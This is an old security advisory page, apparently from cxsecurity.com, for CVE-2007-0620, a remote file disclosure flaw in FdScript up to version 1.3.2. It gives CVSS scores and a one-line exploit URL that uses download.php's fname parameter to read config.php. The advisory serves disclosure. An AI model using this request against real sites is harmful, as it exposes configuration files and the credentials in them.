Bug: FdScript <= v1.3.2 Remote File Disclosure Vulnerability ( Ascii Version )

Search:
WLB2

FdScript <= v1.3.2 Remote File Disclosure Vulnerability

Published
Credit
Risk
2007.02.01
ajann
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0620
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

************************************************************************
*******
# Title : FdScript <= v1.3.2 Remote File Disclosure Vulnerability
# Author : ajann
# Contact : :(
# Site : http://stud.usv.ro/~vlad_l/
# $$ : Free

************************************************************************
*******

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

""""""""""""""""""""
"
# ajann,Turkey
# ...

# Im not Hacker!

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version